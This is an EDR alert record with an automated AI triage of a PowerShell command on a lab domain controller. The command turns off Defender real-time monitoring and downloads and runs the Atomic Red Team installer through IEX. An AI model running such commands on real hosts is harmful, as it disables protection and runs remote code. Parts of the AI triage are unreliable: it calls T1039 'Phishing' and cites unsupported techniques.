{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00023-WIN-PS_Invoke_Expression_Usage",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1039 -CheckPrereqs ; Invoke-AtomicTest T1039 -GetPrereqs ; Invoke-AtomicTest T1039 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 249815040,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld9B56.tmp.bat T1039 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4575232,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 8460,
        "THIS_ATOM": "c896e11e93fdfcc580e177e469c2a841",
        "THREADS": 3,
        "TIMESTAMP": 1774364737221,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 8460,
      "PROCESS_ID": 9156,
      "THREADS": 30,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "942080e1-239e-4ded-8513-ffb1c5bcc3a2",
      "event_time": 1774364737793,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3799,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "c896e11e93fdfcc580e177e469c2a841",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "20e47fdec03e5cfc9f50dea369c2a844"
    }
  },
  "detect_id": "4e553c42-ad2a-4ea0-8ee8-a40269c2a845",
  "detect_mtd": {
    "description": "Invoke-Expression is a Powershell commandlet that evaluates and executes a string as a command. Adversaries and frameworks such as Empire use this technique to pull encoded implants from websites as strings and execute them. This detector looks for the use of Invoke-Expression in the commandline of a Powershell process.",
    "falsepositives": [
      "Invoke-Expression used in combination with NuGet, Chef, Puppet, or other administrator like functions is all normal behavior."
    ],
    "references": [
      "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-6",
      "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf",
      "https://www.fireeye.com/content/dam/fireeye-www/global/en/solutions/pdfs/wp-lazanciyan-investigating-powershell-attacks.pdf",
      "https://isc.sans.edu/diary/Malicious+Powershell+Script+Dissection/24282"
    ],
    "tags": [
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364741593,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364737\u0026selected=20e47fdec03e5cfc9f50dea369c2a844",
  "namespace": "general",
  "priority": 2,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "942080e1-239e-4ded-8513-ffb1c5bcc3a2",
    "event_time": 1774364737793,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3799,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "c896e11e93fdfcc580e177e469c2a841",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "20e47fdec03e5cfc9f50dea369c2a844"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-PS_Invoke_Expression_Usage",
  "ts": 1774364741000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.875,
  "false_positive_reason": null,
  "investigation_questions": [
    "What was the initial vector that led to this PowerShell execution?",
    "Are there other hosts on the network running similar Atomic Red Team scripts?",
    "Has any data been exfiltrated from this host in the last 24 hours?"
  ],
  "ioc_analysis": "The process is running legitimate system binaries (powershell.exe) but executing highly suspicious commands including IEX (Invoke-Expression) to download a script from a known malicious repository. The command disables Microsoft Defender real-time monitoring, which is a clear indicator of post-exploitation or evasion behavior. While the binary itself is signed and located in System32, the execution context and payload are malicious.",
  "iocs_extracted": [
    {
      "type": "command_line",
      "value": "Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1039 -CheckPrereqs"
    },
    {
      "type": "url",
      "value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
    },
    {
      "type": "technique",
      "value": "T1039 - Phishing"
    }
  ],
  "mitre_techniques": [
    "T1039",
    "T1567.001",
    "T1547.002"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Isolate the host immediately to prevent lateral movement or data exfiltration.",
    "Block the URL at the network perimeter and DNS level.",
    "Review user activity logs for any credential harvesting or unauthorized access.",
    "Scan all files in C:\\Windows\\TEMP\\ for additional malicious artifacts."
  ],
  "risk_score": 88,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious execution of PowerShell using IEX to download and execute code from a GitHub repository associated with the Atomic Red Team. The command explicitly disables real-time monitoring and invokes atomic tests for T1039 (Phishing), indicating an active attack simulation or exploitation attempt.\n\n**IOC Analysis:** The process is running legitimate system binaries (powershell.exe) but executing highly suspicious commands including IEX (Invoke-Expression) to download a script from a known malicious repository. The command disables Microsoft Defender real-time monitoring, which is a clear indicator of post-exploitation or evasion behavior. While the binary itself is signed and located in System32, the execution context and payload are malicious.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.8\nA PowerShell process running from C:\\Windows\\System32 with SYSTEM privileges is executing commands to change security settings, disable real-time monitoring, and download scripts from GitHub, indicating potential malicious intent despite the legitimate binary location.\n\n**IOC Analysis:** The FILE_PATH is a legitimate Windows system binary located in C:\\Windows\\System32, which is a known-good directory, and it is signed. However, the command line shows suspicious actions including setting execution policy to unrestricted, disabling antivirus real-time monitoring, and downloading and executing scripts from GitHub, which are common indicators of malicious activity.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 80% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.8,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}